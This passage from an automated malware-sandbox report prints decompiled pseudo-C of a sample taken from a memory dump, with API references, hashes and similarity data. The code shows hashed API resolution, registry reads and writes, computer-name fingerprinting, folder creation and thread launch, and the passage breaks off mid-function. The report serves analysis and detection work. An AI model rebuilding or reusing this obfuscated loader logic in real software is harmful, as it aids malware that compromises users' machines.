									if(__eflags == 0) {
										L12:
										_t33 = E0009BF50(__eflags, 0, 0xb1fd105);
										_t49 = _t51 + 8;
										 *_t33( *_t42, 0, 0x8000);
										goto L3;
									} else {
										__eflags = _v32 - _t42[1];
										if(__eflags != 0) {
											goto L12;
										} else {
											_t22 = 1;
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				return _t22;
			}

0x0009a5eb
0x0009a5f8
0x0009a5fd
0x0009a60e
0x0009a620
0x0009a622
0x0009a625
0x0009a628
0x0009a66b
0x0009a66b
0x0009a62a
0x0009a63a
0x0009a63f
0x0009a646
0x0009a647
0x0009a64e
0x0009a657
0x0009a65e
0x0009a669
0x00000000
0x0009a650
0x0009a650
0x0009a655
0x0009a674
0x0009a678
0x0009a67a
0x0009a67d
0x0009a6d3
0x0009a6d9
0x0009a67f
0x0009a686
0x0009a68b
0x0009a69a
0x0009a69c
0x0009a69e
0x0009a6a0
0x00000000
0x0009a6a2
0x0009a6a9
0x0009a6ae
0x0009a6c0
0x0009a6c2
0x0009a6c4
0x0009a6dd
0x0009a6e4
0x0009a6e9
0x0009a6f5
0x00000000
0x0009a6c6
0x0009a6ca
0x0009a6cd
0x00000000
0x0009a6cf
0x0009a6cf
0x0009a6cf
0x0009a6cd
0x0009a6c4
0x0009a6a0
0x00000000
0x00000000
0x00000000
0x0009a655
0x0009a64e
0x0009a673

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0009A69A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0009A6C0

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction ID: a72eb89c18b470897a678f10b6653c5c1a7be55482207ed17d97ff94bdca1790
Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction Fuzzy Hash: 2431F571744701BBEF216B60DC13F6A76D09B42B11F184828FAAD961D1E7B1F510EAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0009ABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E000A5000(_t11, _t38, 0xffffffff);
				E0009BF50(_t38, 9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				_t39 = _t14;
				if(_t14 == 0) {
					E0009BF50(_t39, 9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E0009BF50( !0x00000000, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}

0x0009abfe
0x0009ac16
0x0009ac27
0x0009ac29
0x0009ac2e
0x0009ac30
0x0009ac42
0x0009ac56
0x0009ac5d
0x0009ac61
0x0009ac6b
0x0009ac76
0x0009ac76
0x0009ac7e

APIs

RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 0009AC27
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 0009AC56

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

RegCloseKey.KERNEL32(?,?,?,?,?), ref: 0009AC76

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseLibraryLoadOpenQueryValue
String ID:
API String ID: 3751545530-0
Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction ID: 711e3e43aad391e08f1cf9e3f977c3c6a261da2600694e1e7e3509716ed60c4c
Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction Fuzzy Hash: 6D0144779402287BDF109E959C42FEA3758DB45B75F050224FE28A72C2E6A1BD1187F1

Uniqueness

Uniqueness Score: -1.00%

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000A4680(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				intOrPtr _v72;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				char _v208;
				char _v220;
				char _v232;
				char _v248;
				char _v266;
				char _v306;
				char _v528;
				char _v1048;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr* _t177;
				void* _t178;
				intOrPtr _t179;
				signed int _t229;
				signed int _t233;
				void* _t236;
				void* _t238;
				void* _t244;
				void* _t252;
				signed int _t254;
				void* _t263;
				void* _t269;
				void* _t276;
				intOrPtr _t279;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t293;
				signed char _t299;
				void* _t314;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t325;
				WCHAR* _t327;
				signed int _t329;
				void* _t339;
				signed int _t341;
				void* _t342;
				void* _t343;
				signed int _t350;
				signed int _t353;
				intOrPtr _t368;
				intOrPtr _t404;
				signed int _t487;
				intOrPtr _t488;
				signed int _t489;
				intOrPtr _t490;
				signed int _t499;
				intOrPtr _t512;
				signed int _t513;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t593;
				void* _t604;
				void* _t606;
				void* _t609;

				_t171 = E000A7EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
				_t531 = _t530 + 0xc;
				_t611 = _t171;
				if(_t171 == 0) {
					L2:
					_t350 = 0;
				} else {
					_t173 = E000A9AC0(_t611, 0xffffffff); // executed
					_t473 =  ==  ? 0x8026 : 0x801a;
					_t175 = E00099D50(0x647400a4);
					_t177 = E0009BF50(_t173 - 4, _t175, E00099D50(0x644e562b));
					_t535 = _t531 + 0x14;
					_t351 =  &_v1048;
					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
					if(_t178 == 0) {
						_t179 = E00098290(0x3d0);
						_t510 = _t179;
						E000A1E90(__eflags, _t179 + 0xc); // executed
						_t2 = _t510 + 0x1c; // 0x1c, executed
						E000A3BC0(_t2, __eflags);
						_t3 = _t510 + 0xe6; // 0xe6
						E00095CD0(__eflags, 2, _t3, 4, 8);
						_t4 = _t510 + 0xf8; // 0xf8
						E0009A980(_t4); // executed
						E000AF740( &_v64);
						__eflags = _a8;
						_t375 =  !=  ? 0xb0bf2 : 0xb051c;
						E000A5180( &_v1048,  &_v64, E00097200( !=  ? 0xb0bf2 : 0xb051c,  &_v528), 0); // executed
						E000AF740( &_v232);
						E000A5180( &_v1048,  &_v232, 0, 0); // executed
						E000AF740( &_v220);
						E000A5180( &_v1048,  &_v220, 0, 0); // executed
						E000AF740( &_v208);
						E000A5180( &_v1048,  &_v208, 0, 0); // executed
						E000AF740( &_v196);
						E000A5180(_t351,  &_v196, 0, 0); // executed
						E000AF740( &_v184);
						E000A5180(_t351,  &_v184, 0, 1); // executed
						E000AF740( &_v172);
						E000A5180(_t351,  &_v172, 0, 1); // executed
						E000AF740( &_v160);
						E000A5180(_t351,  &_v160, 0, 0); // executed
						E000AF740( &_v148);
						E000A5180(_t351,  &_v148, 0, 0); // executed
						E000AF740( &_v136);
						E000A5180(_t351,  &_v136, 0, 0); // executed
						E000AF740( &_v124);
						E000A5180(_t351,  &_v124, 0, 0); // executed
						E000AF740( &_v112);
						E000A5180(_t351,  &_v112, 0, 0); // executed
						E000AF740( &_v100);
						E000A5180(_t351,  &_v100, 0, 0); // executed
						_t487 =  &_v88;
						E000AF740(_t487);
						_t470 = _t487;
						E000A5180(_t351, _t487, 0, 0); // executed
						E000921E0(2, 0x80000001, E00097200(0xb09d0,  &_v306),  &_v266, 4, 8); // executed
						_t404 = _t179;
						_t23 = _t404 + 0x3be; // 0x3be
						_t488 = _t404;
						_v24 = _t404;
						E0009D4F0(_t487, 0, _t23, 4, 8);
						_t25 = _t488 + 0x3c7; // 0x3c7
						E0009D4F0(_t487, 0, _t25, 4, 8);
						_t489 = E000922E0(__eflags, E0009BA30(__eflags, _t351), 0xffffffff);
						_t229 = E0009EC30(E000AFCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
						_t512 = _v24;
						__eflags = _t229;
						_t353 = 0 | _t229 == 0x00000000;
						_v20 = _t512 + 0x25e;
						_t233 = E0009EC30(E000AFCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
						_t38 = _t353 + 1; // 0x1
						__eflags = _t233;
						_t513 = _t512 + 0x27e;
						_t408 =  !=  ? _t353 : _t38;
						_v20 =  !=  ? _t353 : _t38;
						_t236 = E0009EC30(E000AFCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
						_t490 = _v24;
						__eflags = _t236 - 1;
						asm("sbb esi, esi");
						_v28 = _t490 + 0x29e;
						_t238 = E000AFCF0( &_v208);
						_v32 = _t489;
						__eflags = E0009EC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
						asm("sbb esi, [ebp-0x10]");
						_v28 =  ~_t513;
						_v20 = _t490 + 0x2be;
						_t244 = E000AFCF0( &_v196);
						__eflags = E0009EC30(_t244 + _t489 * 2, 0xffffffff, _v20, E00099D50(0x6474008c));
						_t356 = 0 | __eflags == 0x00000000;
						_v20 = E00091460(__eflags, _t513,  ~(__eflags == 0));
						E00091460(__eflags, _v28, _t356);
						_t252 = E000AFCF0( &_v184);
						_t254 = E0009EC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E00099D50(0x6474008c));
						__eflags = _t254;
						_v28 = E00099D50(0x59d06af4);
						_v36 = _v24 + 0x23e;
						_v36 = E0009EC30(E000AFCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
						_v40 = E00099D50(0xe4894f31);
						_t263 = E0009EC30(E000AFCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
						__eflags = _v36 - 1;
						asm("adc ebx, 0x0");
						__eflags = _t263 - 1;
						asm("adc ebx, 0x0");
						__eflags = E0009EC30(E000AFCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
						_t419 = 0 | __eflags == 0x00000000;
						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
						_t269 = E00091460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
						E00091460(__eflags, _v20, _t419);
						_v20 = _v24 + 0x31e;
						__eflags = E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
						_v20 = E00091460(E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
						_t276 = E000AFCF0( &_v124);
						__eflags = E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c));
						_t279 = E00091460(E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)), _v20, 0 | E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)) == 0x00000000);
						_v20 = _v24 + 0x35e;
						__eflags = E0009EC30(E000AFCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc esi, 0x0");
						_v20 = _t279;
						_t287 = E000955C0(E0009EC30(E000AFCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
						_t288 = E00099D50(0x1eac204e);
						_t290 = E00091460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E00099D50(0x1eac204e));
						E00091460(__eflags, _v20, _t287 & 0x00000001);
						_t368 = _v24;
						_v20 = _t368 + 0x38e;
						_t293 = E000AFCF0( &_v88);
						__eflags = E0009EC30(_t293 + _v32 * 2, 0xffffffff, _v20, E00099D50(0x647400bc)) - 1;
						asm("adc esi, 0x0");
						__eflags = E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
						asm("adc esi, 0x0");
						_t299 = E00096BB0(E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
						_t593 = _t535 + 0x240;
						__eflags = _t299 & 0x00000001;
						if((_t299 & 0x00000001) != 0) {
							L14:
							_t350 = 0;
							__eflags = 0;
						} else {
							_t314 = E00099D50(0x647410ac);
							_t499 = E0009D620(_t314, E00099D50(0x6474ff53));
							_t319 = E000920A0(__eflags, _t499,  !(E00099D50(0x6474ff53)));
							E00099D50(0x6474ff53);
							_t321 = E00099D50(0x647410ac);
							_t323 = E0009D620(_t321, E00099D50(0x6474ff53));
							 *(_t368 + 0x1fa) = _t323 << E00099D50(0x647400bc) | _t319 & _t499;
							_t325 = E0009D030(_t324, __eflags, _t368); // executed
							_t604 = _t593 + 0x38;
							__eflags = _t325;
							if(_t325 == 0) {
								goto L14;
							} else {
								_t529 = _a4;
								E000AEDD0( &_v52);
								_t327 = E000AFCF0(_a4);
								_t329 = E0009A5E0(_t327,  &_v76, E00099D50(0x647400ae)); // executed
								_t606 = _t604 + 0x10;
								__eflags = _t329;
								if(_t329 != 0) {
									_t470 = _v72 + _v76;
									__eflags = _v72 + _v76;
									E000AF410(_v76,  &_v52, _v76, _v72 + _v76); // executed
									E000A9C40(__eflags,  &_v76); // executed
									_t606 = _t606 + 4;
								}
								_t447 =  &_v52;
								__eflags = E000AF190( &_v52);
								if(__eflags != 0) {
									_t339 = E000AF190( &_v52);
									_t341 = E000ACB00(__eflags,  &_v248, E000AEE10( &_v52), _t339); // executed
									_t609 = _t606 + 0xc;
									__eflags = _t341;
									if(__eflags != 0) {
										E0009ECC0(_t341,  &_v248, _t470, __eflags); // executed
									}
									_t342 = E000AF190( &_v52);
									_t343 = E000AEE10( &_v52);
									_t447 =  &_v64;
									E000A9600(E000AFCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
									_t606 = _t609 + 0xc; // executed
								}
								E000A04C0(_t447, _t470, __eflags); // executed
								E000A5040(_t447, _t470, __eflags); // executed
								__eflags = E000A6700(__eflags);
								if(__eflags != 0) {
									E0009BF50(__eflags, 0, 0xa0733d4);
									CreateThread(0, 0, E000A5420, E000A7640(E000AFCF0(_t529), 0xffffffff), 0, 0); // executed
								}
								E000AFB40( &_v52); // executed
								_t350 = 1;
							}
						}
						E000AFB20( &_v88);
						E000AFB20( &_v100);
						E000AFB20( &_v112);
						E000AFB20( &_v124);
						E000AFB20( &_v136);
						E000AFB20( &_v148);
						E000AFB20( &_v160);
						E000AFB20( &_v172);
						E000AFB20( &_v184);
						E000AFB20( &_v196);
						E000AFB20( &_v208);
						E000AFB20( &_v220);
						E000AFB20( &_v232);
						E000AFB20( &_v64);
					} else {
						goto L2;
					}
				}
				return _t350;
			}

0x000a4695
0x000a469a
0x000a469d
0x000a469f
0x000a46f4
0x000a46f4
0x000a46a1
0x000a46a3
0x000a46b7
0x000a46bf
0x000a46d8
0x000a46dd
0x000a46e0
0x000a46ee
0x000a46f2
0x000a4700
0x000a4708
0x000a470e
0x000a4716
0x000a4719
0x000a471e
0x000a472b
0x000a4733
0x000a473a
0x000a4747
0x000a474c
0x000a475a
0x000a4774
0x000a4784
0x000a4791
0x000a47a1
0x000a47ae
0x000a47be
0x000a47cb
0x000a47db
0x000a47e8
0x000a47f8
0x000a4805
0x000a4815
0x000a4822
0x000a4832
0x000a483f
0x000a484f
0x000a485c
0x000a486c
0x000a4879
0x000a4886
0x000a4893
0x000a48a0
0x000a48ad
0x000a48ba
0x000a48c7
0x000a48cf
0x000a48d4
0x000a48db
0x000a48e1
0x000a4910
0x000a4918
0x000a4920
0x000a4926
0x000a4928
0x000a4932
0x000a493a
0x000a4947
0x000a4966
0x000a4976
0x000a497e
0x000a4983
0x000a498b
0x000a4994
0x000a49a7
0x000a49af
0x000a49b2
0x000a49b4
0x000a49ba
0x000a49bd
0x000a49d6
0x000a49de
0x000a49e1
0x000a49ea
0x000a49f2
0x000a49f5
0x000a49fd
0x000a4a10
0x000a4a19
0x000a4a20
0x000a4a29
0x000a4a2c
0x000a4a52
0x000a4a54
0x000a4a65
0x000a4a6c
0x000a4a83
0x000a4aa0
0x000a4aaa
0x000a4abf
0x000a4ace
0x000a4ae9
0x000a4aff
0x000a4b19
0x000a4b32
0x000a4b36
0x000a4b39
0x000a4b3f
0x000a4b60
0x000a4b68
0x000a4b71
0x000a4b78
0x000a4b8c
0x000a4ba3
0x000a4bc3
0x000a4bd5
0x000a4bde
0x000a4c02
0x000a4c0b
0x000a4c21
0x000a4c3c
0x000a4c42
0x000a4c45
0x000a4c67
0x000a4c79
0x000a4c99
0x000a4ca5
0x000a4cad
0x000a4cb9
0x000a4cbc
0x000a4ce3
0x000a4cec
0x000a4d03
0x000a4d06
0x000a4d0c
0x000a4d11
0x000a4d14
0x000a4d16
0x000a4ec7
0x000a4ec7
0x000a4ec7
0x000a4d1c
0x000a4d21
0x000a4d42
0x000a4d55
0x000a4d66
0x000a4d73
0x000a4d8c
0x000a4da9
0x000a4db0
0x000a4db5
0x000a4db8
0x000a4dba
0x00000000
0x000a4dc0
0x000a4dc0
0x000a4dc6
0x000a4dcd
0x000a4de7
0x000a4dec
0x000a4def
0x000a4df1
0x000a4dfc
0x000a4dfc
0x000a4e00
0x000a4e06
0x000a4e0b
0x000a4e0b
0x000a4e0e
0x000a4e16
0x000a4e18
0x000a4e1f
0x000a4e36
0x000a4e3b
0x000a4e3e
0x000a4e40
0x000a4e48
0x000a4e48
0x000a4e52
0x000a4e5b
0x000a4e60
0x000a4e6d
0x000a4e72
0x000a4e72
0x000a4e75
0x000a4e7a
0x000a4e84
0x000a4e86
0x000a4e8f
0x000a4eb9
0x000a4eb9
0x000a4ebe
0x000a4ec3
0x000a4ec3
0x000a4dba
0x000a4ecc
0x000a4ed4
0x000a4edc
0x000a4ee4
0x000a4eef
0x000a4efa
0x000a4f05
0x000a4f10
0x000a4f1b
0x000a4f26
0x000a4f31
0x000a4f3c
0x000a4f47
0x000a4f4f
0x00000000
0x00000000
0x00000000
0x000a46f2
0x000a4f60

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 000A46EE

Part of subcall function 000A5180: CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Part of subcall function 000921E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210

Part of subcall function 0009A5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620

CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 000A4EB9

Part of subcall function 000A9C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
Part of subcall function 000A9C40: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create$CloseDirectoryFileFolderFreeHandlePathThreadVirtual
String ID:
API String ID: 1450970588-0
Opcode ID: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction ID: e26f6a2a927ebc3eb0cd91757af0931e6c7052d795acac1f300664f7a469dd9f
Opcode Fuzzy Hash: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction Fuzzy Hash: AD32D3B5E002096BDF10EBE0DC53FFE7269AB51314F540574F819A72C3EE706A098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A3BC0(intOrPtr __ecx, void* __eflags) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v52;
				char _v86;
				char _v122;
				char _v158;
				char _v196;
				char _v256;
				short _v456;
				char _v574;
				char _v774;
				int _t23;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				char _t33;
				intOrPtr _t36;
				void* _t38;
				void* _t40;
				signed char _t43;
				char* _t53;
				DWORD* _t59;
				void* _t61;
				void* _t62;
				void* _t66;

				_v24 = __ecx;
				_v20 = 0x64;
				E0009BF50(__eflags, 0, 0x6f6e3c7);
				_t62 = _t61 + 8;
				_t59 =  &_v20;
				_t23 = GetComputerNameW( &_v456, _t59); // executed
				_t81 = _t23;
				if(_t23 == 0) {
					E000A7700( &_v456, E00097200(0xb075e,  &_v122), 0xffffffff);
					_t62 = _t62 + 0x14;
				}
				_v20 = E00099D50(0x647400c8);
				_t25 = E00099D50(0x647400a5);
				_t27 = E0009BF50(_t81, _t25, E00099D50(0x6e1cdffb));
				_t66 = _t62 + 0x14;
				_t53 =  &_v774;
				_t28 =  *_t27(_t53, _t59);
				_t82 = _t28;
				if(_t28 == 0) {
					E000A7700(_t53, E00097200(0xb075e,  &_v52), 0xffffffff);
					_t66 = _t66 + 0x14;
				}
				_t30 = E00097200(0xb0a40,  &_v574);
				_t33 = E00095350(_t82, 0x80000002, _t30, E00097200(0xb0500,  &_v196)); // executed
				_v32 = _t33;
				_t36 = E0009E360(E00097200(0xb07b0,  &_v256), _t82, 0x80000002, _t30, _t35); // executed
				_v28 = _t36;
				_t38 = E00097200(0xb0990,  &_v158);
				_t40 = E000ACC50( &_v32, _t82,  &_v32, 8);
				_push(_t53);
				_push(_t40);
				_t60 = _v24;
				_v20 = E000AD650( &_v456, _v24, 0x65, _t38,  &_v456);
				_t43 = E000955C0(_t42, 0xffffffff);
				if((_t43 & 0x00000001) != 0) {
					return E000A7700(_t60, E00097200(0xb08a0,  &_v86), 0xffffffff);
				}
				return _t43;
			}

0x000a3bcc
0x000a3bcf
0x000a3bdd
0x000a3be2
0x000a3be5
0x000a3bf0
0x000a3bf2
0x000a3bf4
0x000a3c0b
0x000a3c10
0x000a3c10
0x000a3c20
0x000a3c28
0x000a3c41
0x000a3c46
0x000a3c49
0x000a3c51
0x000a3c53
0x000a3c55
0x000a3c6c
0x000a3c71
0x000a3c71
0x000a3c80
0x000a3ca5
0x000a3cad
0x000a3ccb
0x000a3cd3
0x000a3ce2
0x000a3cf2
0x000a3cfa
0x000a3cfb
0x000a3d06
0x000a3d12
0x000a3d18
0x000a3d22
0x00000000
0x000a3d3e
0x000a3d4b

APIs

GetComputerNameW.KERNEL32(?,00000064), ref: 000A3BF0

Strings

d, xrefs: 000A3BCF

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ComputerName
String ID: d
API String ID: 3545744682-2564639436
Opcode ID: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction ID: 4b4a9cf9320b269edf301113e3bbf16b8a91b567772b7bbc5c29563ce441ba0e
Opcode Fuzzy Hash: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction Fuzzy Hash: 7F31C3E3C441187AEB11A7A0AC03DFF766C9B12715F050135FD1CA2283FA21AB188BF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A5180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
				intOrPtr _v20;
				char _v50;
				short _v52;
				char _v572;
				int _t10;
				void* _t16;
				char* _t20;
				void* _t25;
				WCHAR* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t20 = _a4;
				_t25 = __ecx;
				_v20 = __edx;
				_v52 = 0;
				_t34 = _t20;
				if(_t20 == 0) {
					_t20 =  &_v52;
					_v52 = 0x2e;
					E00095CD0(_t34, 0,  &_v50, 2, 3);
					_t28 = _t28 + 0x10;
				}
				_t27 =  &_v572;
				_t10 = E00091490(2, _t25, _t27, 0, 3, 5); // executed
				_t29 = _t28 + 0x18;
				_t35 = _t10;
				if(_t10 != 0) {
					E0009BF50(_t35, 0, E00099D50(0x677c729b));
					_t31 = _t29 + 0xc;
					_t10 = CreateDirectoryW(_t27, 0); // executed
					if(_t10 != 0) {
						_t37 = _a8;
						if(_a8 != 0) {
							E000A0F60(_t37, _t27, 1, 1); // executed
							_t31 = _t31 + 0xc;
						}
						E000AECC0(E00099D50(0x647401a8));
						_t16 = E00091490(0, _t27, E000AFCF0(_v20), _t20, 3, 5); // executed
						return _t16;
					}
				}
				return _t10;
			}

0x000a518c
0x000a518f
0x000a5191
0x000a5194
0x000a519a
0x000a519c
0x000a519e
0x000a51a1
0x000a51b1
0x000a51b6
0x000a51b6
0x000a51b9
0x000a51c9
0x000a51ce
0x000a51d1
0x000a51d3
0x000a51e5
0x000a51ea
0x000a51f0
0x000a51f4
0x000a51f6
0x000a51fa
0x000a5201
0x000a5206
0x000a5206
0x000a521c
0x000a5231
0x00000000
0x000a5236
0x000a51f4
0x000a5243

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Strings

., xrefs: 000A51A1

Memory Dump Source

Source File: 00000005.00000002.2358985046.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDirectory
String ID: .
API String ID: 4241100979-248832578
Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction ID: 98b28f1730cafa2b0814f29adbad9fffe3e45810f82169d2cf3611196d2162e0
Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction Fuzzy Hash: DE1194A5A8031436FB2076D5AC5BFFF766C9F56B55F050024FE087A2C3FAA15A0486E2

Uniqueness

Uniqueness Score: -1.00%

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000A58D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v66;
				char _v124;
				char _v238;
				char _v1278;
				char _v1794;
				void* __esi;
				signed char _t35;
				signed char _t37;
				void* _t38;
				intOrPtr* _t40;
				signed char _t44;
				intOrPtr* _t45;
				signed char _t47;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t113;
				void* _t116;

				_t116 = __eflags;
				_push(__eax);
				_t1 =  &_a4; // 0xa37e6
				_t86 = __edx;
				_t69 = __ecx;
				_v17 =  *_t1;
				_t89 = L0009C1E0(0x1c);
				E000AED20(_t30);
				L000AFA50(_t89, _t69);
				_t3 = _t89 + 0xc; // 0xc
				_t77 = _t3;
				L000AFA50(_t3, __edx);
				 *((char*)(_t89 + 0x18)) = _v17;
				_t35 = E000A9AC0(_t116, 0xffffffff); // executed
				_t37 = E00094350(_t35 & 0x000000ff, 4);
				_t98 = _t95 + 0x10;
				_t117 = _t37 & 0x00000001;
				if((_t37 & 0x00000001) != 0) {
					_t77 = _t89;
					_t98 = _t98 + 4;
					_pop(_t89);
					_pop(_t86);
					_pop(_t69);
					_pop(_t93);
					_t90 = _t77;
					_t38 = E000AFCF0(_t77 + 0xc);
					_t87 =  &_v1794;
					E000A7700(_t87, _t38, 0xffffffff);
					_t40 = E0009BF50(_t117, 3, 0x5ea9ec7);
					 *_t40(_t87, _t89, _t86, _t69, _t93);
					_t44 = E00094350(E000A9AC0(_t117, 0xffffffff) & 0x000000ff, 4);
					_t103 = _t98 - 0x6f4 + 0x20;
					if((_t44 & 0x00000001) != 0) {
						_t45 = E0009BF50(__eflags, 9, 0x28243c7);
						_t70 =  *_t45(0, 0, 2);
						_t47 = E0009A500(__eflags, _t46, 0);
						_t105 = _t103 + 0x10;
						__eflags = _t47 & 0x00000001;
						if((_t47 & 0x00000001) == 0) {
							__eflags =  *((char*)(_t90 + 0x18));
							_v24 = _t70;
							if( *((char*)(_t90 + 0x18)) == 0) {
								E000A7700( &_v1278, _t87, 0xffffffff);
								_t107 = _t105 + 0xc;
							} else {
								E000AD650(E00097200(0xb0840,  &_v66),  &_v1278, 0x208, _t60, _t87);
								_t107 = _t105 + 0x18;
							}
							_t50 = E0009BF50(__eflags, 9, 0x42453f7);
							_t108 = _t107 + 8;
							_v28 = _t50;
							_t51 = E000AFCF0(_t90);
							_t52 = E000AFCF0(_t90);
							_t88 = _v24;
